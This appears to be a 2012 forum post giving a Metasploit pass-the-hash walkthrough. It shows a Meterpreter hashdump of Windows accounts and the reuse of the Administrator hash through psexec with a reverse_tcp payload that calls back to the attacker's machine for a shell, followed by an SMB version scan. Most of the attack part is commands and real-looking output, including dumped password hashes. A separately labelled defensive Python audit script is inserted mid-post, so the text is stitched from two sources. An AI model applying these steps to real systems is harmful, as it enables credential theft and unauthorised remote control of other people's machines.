151 HASH attack with METASPLOIT
Posted on 2012-9-11 01:11:59
We obtained the hashes of some ordinary domain host.


    msf > use exploit/multi/handler
    msf  exploit(handler) > exploit

    [*] Started reverse handler on 1.1.1.3:4444
    [*] Starting the payload handler...
    [*] Sending stage (752128 bytes) to 1.1.1.7
    [*] Meterpreter session 1 opened (1.1.1.3:4444 -> 1.1.1.7:1061) at 2012-06-27 12:54:06 -0700

    meterpreter > hashdump
    Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
    brk:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:198637c481956d26764ca5b909854cfc:fd119afad3d4fd346550b862a9171f09:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:842e5689e6a7ea73811a50b4b5b88933:::
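Before these hashes are passed anywhere, a defender would want to know what the dump itself reveals. The following is an added example, not code from the original post: it parses the hashdump lines above (copied verbatim as sample input) and flags the conditions that make a pass-the-hash move possible: LM hashes still being stored, accounts with an empty password, and the same NT hash shared by several accounts. The finding names and the `parse_hashdump`/`audit_hashdump` helpers are this example's own.

```python
# Added example (not part of the original post): audit a pwdump/hashdump
# listing for weaknesses a defender cares about.
import re
from collections import defaultdict

# Well-known constants: LM hash stored when LM storage is disabled (NoLMHash),
# and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)

# Sample input: the hashdump lines from the post above.
SAMPLE = """\
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
brk:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:198637c481956d26764ca5b909854cfc:fd119afad3d4fd346550b862a9171f09:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:842e5689e6a7ea73811a50b4b5b88933:::
"""

def parse_hashdump(text):
    """Return (user, rid, lm, nt) tuples; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            rows.append((user, int(rid), lm.lower(), nt.lower()))
    return rows

def audit_hashdump(text):
    """Flag LM storage, empty passwords and NT-hash reuse across accounts."""
    findings = []
    by_nt = defaultdict(list)
    for user, rid, lm, nt in parse_hashdump(text):
        if lm != EMPTY_LM:
            findings.append(("LM_HASH_STORED", user))   # NoLMHash not enforced
        if nt == EMPTY_NT:
            findings.append(("EMPTY_PASSWORD", user))
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            # Same NT hash => same password; one stolen hash opens every account.
            findings.append(("SHARED_PASSWORD", ",".join(sorted(users))))
    return findings

if __name__ == "__main__":
    for kind, who in audit_hashdump(SAMPLE):
        print(f"{kind}: {who}")
```

On the post's own data this reports that Administrator, brk and HelpAssistant still have LM hashes stored, that Guest has an empty password, and that Administrator and brk share one password, which is exactly the reuse the psexec step below depends on.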
Even if we cannot crack the hash, we can still use it directly for authentication; it must be in this form:
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
For example:


    msf  exploit(handler) > use exploit/windows/smb/psexec
    msf  exploit(psexec) > show options

    Module options (exploit/windows/smb/psexec):

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       RHOST                       yes       The target address
       RPORT      445              yes       Set the SMB service port
       SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
       SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
       SMBPass                     no        The password for the specified username
       SMBUser                     no        The username to authenticate as


    Exploit target:

       Id  Name
       --  ----
       0   Automatic
Set the parameters:


    msf  exploit(psexec) > set RHOST 1.1.1.10
    RHOST => 1.1.1.10
    msf  exploit(psexec) > set SMBUser Administrator
    SMBUser => Administrator
    msf  exploit(psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
    SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
    msf  exploit(psexec) > set SMBDomain dis9.local
    SMBDomain => dis9.local
    msf  exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf  exploit(psexec) > exploit

    [*] Started reverse handler on 1.1.1.3:4444
    [*] Connecting to the server...
    [*] Authenticating to 1.1.1.10:445|dis9 as user 'Administrator'...
    [*] Uploading payload...
    [*] Created \dSMaomfF.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:1.1.1.10[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:1.1.1.10[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (Dpttxxht - "MMidwbqlUXvEiQYXhfTgpLUvxW")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Sending stage (752128 bytes) to 1.1.1.10
    [*] Closing service handle...
    [*] Deleting \dSMaomfF.exe...
    [*] Meterpreter session 2 opened (1.1.1.3:4444 -> 1.1.1.10:1201) at 2012-06-27 12:55:29 -0700
Key parameter:
    SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
If the admin$ share has been removed, you can scan for other ones.
Domain details:
    auxiliary/scanner/smb/smb_version


    msf  auxiliary(smb_version) > set RHOSTS 1.1.1.10
    RHOSTS => 1.1.1.10
    msf  auxiliary(smb_version) > exploit

    [*] 1.1.1.10:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:DIS9TEAM-DOMAIN) (domain:DIS9)
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf  auxiliary(smb_version) >


